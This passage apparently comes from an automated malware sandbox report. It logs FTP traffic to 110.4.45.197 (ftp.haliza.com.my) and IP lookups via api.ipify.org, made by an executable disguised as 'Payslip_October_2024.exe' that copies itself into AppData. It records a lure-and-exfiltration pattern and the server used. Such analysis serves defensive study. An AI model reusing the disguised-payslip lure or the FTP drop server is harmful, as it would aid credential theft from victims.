                                                                                                          Nov 4, 2024 21:28:23.591012001 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.591044903 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.591053963 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.591064930 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.591175079 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.591185093 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.591243029 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:23.591371059 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:23.591551065 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.591764927 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:23.596515894 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.596651077 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.596751928 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.596796989 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:23.597208977 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.601998091 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.602042913 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.602061033 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.602070093 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.602078915 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.602089882 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.602098942 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.602108002 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.602279902 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.602806091 CET5915650042110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:23.603213072 CET5004259156192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:23.680521965 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:24.379509926 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:24.477339029 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:37.753177881 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:37.758310080 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:38.102790117 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:38.103236914 CET5004356373192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:38.108555079 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:38.108654022 CET5004356373192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:38.108731985 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:38.113632917 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.042651892 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.047185898 CET5004356373192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:39.052325964 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.052349091 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.052359104 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.052395105 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.052403927 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.052541018 CET5004356373192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:39.052892923 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.052902937 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.052911997 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.053272009 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.053281069 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.054477930 CET5004356373192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:39.057455063 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.057490110 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.057543039 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.057552099 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.057629108 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.058053970 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.058123112 CET5004356373192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:39.060218096 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.060509920 CET5004356373192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:39.063071966 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.063148022 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.063157082 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.063244104 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.063265085 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.066828012 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.067023039 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.067986012 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.069139957 CET5637350043110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.082603931 CET5004356373192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:39.183341026 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:39.863949060 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:39.993041992 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:46.652870893 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:46.658432007 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.001415968 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.001885891 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.007582903 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.007723093 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.007858992 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.013056040 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.921161890 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.921396971 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.926417112 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.926467896 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.926467896 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.926477909 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.926486969 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.926526070 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.926546097 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.926557064 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.926565886 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.926605940 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.926621914 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.926640034 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.926650047 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.926664114 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.926682949 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.926686049 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.926707029 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.926736116 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.931370974 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.931416988 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.931518078 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.931566000 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.931567907 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.931574106 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.931600094 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.931608915 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.931610107 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.931621075 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.931652069 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.932156086 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.932240963 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.936378956 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.936573982 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.936613083 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.937058926 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.938281059 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.941216946 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.941226006 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.941574097 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.942127943 CET5037150044110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:47.942174911 CET5004450371192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:47.992996931 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:48.665375948 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:48.790659904 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:50.512969017 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:50.518081903 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:50.862457037 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:50.863075972 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:50.868721008 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:50.868864059 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:50.869215965 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:50.875266075 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.800158978 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.800479889 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.805507898 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.805541992 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.805557966 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.805562973 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.805569887 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.805579901 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.805596113 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.805624008 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.805630922 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.805641890 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.805656910 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.805665970 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.805672884 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.805691957 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.805696011 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.805706978 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.805751085 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.805880070 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.805917025 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.810498953 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.810528994 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.810539961 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.810549974 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.810558081 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.810568094 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.810583115 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.810592890 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.810614109 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.810628891 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.810653925 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.810738087 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.810822964 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.810867071 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.810914040 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.815808058 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.816402912 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.816446066 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.816807985 CET5981650045110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:51.816854000 CET5004559816192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:51.993005991 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:52.232244968 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:52.238329887 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:52.571675062 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:52.577948093 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:52.581541061 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:52.586884022 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:52.587097883 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:52.588850021 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:52.594065905 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:52.789918900 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.481708050 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.481980085 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487047911 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487073898 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487096071 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487122059 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487138987 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487149000 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487159014 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487176895 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487199068 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487323999 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487334013 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487343073 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487353086 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487368107 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487399101 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.487413883 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.487462044 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.492099047 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.492139101 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.492172003 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.492182970 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.492206097 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.492213964 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.492216110 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.492225885 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.492233038 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.492247105 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.492268085 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.492291927 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.493091106 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.493171930 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.497436047 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.497457981 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.497503996 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.497514963 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.497833967 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.497893095 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.498226881 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.498295069 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.498435974 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.498445988 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.498584986 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.499067068 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.499628067 CET6036350046110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:53.499671936 CET5004660363192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:53.586764097 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:28:54.331672907 CET2150040110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:28:54.496790886 CET5004021192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:29:03.609679937 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:29:03.614762068 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:29:03.959089041 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:29:03.959532976 CET5004760390192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:29:03.964752913 CET6039050047110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:29:03.964875937 CET5004760390192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:29:03.964960098 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:29:03.970962048 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:29:04.867230892 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:29:04.914922953 CET4973521192.168.2.4110.4.45.197

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 4, 2024 21:24:55.516026020 CET5305053192.168.2.41.1.1.1
                                                                                                          Nov 4, 2024 21:24:55.523209095 CET53530501.1.1.1192.168.2.4
                                                                                                          Nov 4, 2024 21:24:56.901248932 CET6220553192.168.2.41.1.1.1
                                                                                                          Nov 4, 2024 21:24:57.171571016 CET53622051.1.1.1192.168.2.4

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Nov 4, 2024 21:24:55.516026020 CET192.168.2.41.1.1.10x7565Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                          Nov 4, 2024 21:24:56.901248932 CET192.168.2.41.1.1.10xe40cStandard query (0)ftp.haliza.com.myA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Nov 4, 2024 21:24:55.523209095 CET1.1.1.1192.168.2.40x7565No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                          Nov 4, 2024 21:24:55.523209095 CET1.1.1.1192.168.2.40x7565No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                          Nov 4, 2024 21:24:55.523209095 CET1.1.1.1192.168.2.40x7565No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                          Nov 4, 2024 21:24:57.171571016 CET1.1.1.1192.168.2.40xe40cNo error (0)ftp.haliza.com.my110.4.45.197A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • api.ipify.org

                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449733104.26.12.2054437692C:\Users\user\Desktop\Payslip_October_2024.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-11-04 20:24:56 UTC155OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                          Host: api.ipify.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-11-04 20:24:56 UTC399INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 04 Nov 2024 20:24:56 GMT
                                                                                                          Content-Type: text/plain
                                                                                                          Content-Length: 14
                                                                                                          Connection: close
                                                                                                          Vary: Origin
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8dd75497bd48699a-DFW
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1323&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2285714&cwnd=248&unsent_bytes=0&cid=e98b30be497a1c8f&ts=249&x=0"
                                                                                                          2024-11-04 20:24:56 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
                                                                                                          Data Ascii: 173.254.250.69


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449740104.26.12.2054438008C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-11-04 20:25:08 UTC155OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                          Host: api.ipify.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-11-04 20:25:09 UTC399INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 04 Nov 2024 20:25:09 GMT
                                                                                                          Content-Type: text/plain
                                                                                                          Content-Length: 14
                                                                                                          Connection: close
                                                                                                          Vary: Origin
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8dd754e77ab82cc1-DFW
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1422&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2026592&cwnd=247&unsent_bytes=0&cid=42a88fb69f4b05cf&ts=237&x=0"
                                                                                                          2024-11-04 20:25:09 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
                                                                                                          Data Ascii: 173.254.250.69


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449750104.26.12.2054436128C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-11-04 20:25:18 UTC155OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                          Host: api.ipify.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-11-04 20:25:18 UTC399INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 04 Nov 2024 20:25:18 GMT
                                                                                                          Content-Type: text/plain
                                                                                                          Content-Length: 14
                                                                                                          Connection: close
                                                                                                          Vary: Origin
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8dd75522cfaee5a9-DFW
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1224&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2500863&cwnd=240&unsent_bytes=0&cid=27fae0df9f3864a9&ts=662&x=0"
                                                                                                          2024-11-04 20:25:18 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
                                                                                                          Data Ascii: 173.254.250.69


                                                                                                          FTP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                          Nov 4, 2024 21:24:58.145982981 CET2149735110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.
                                                                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 04:24. Server port: 21.
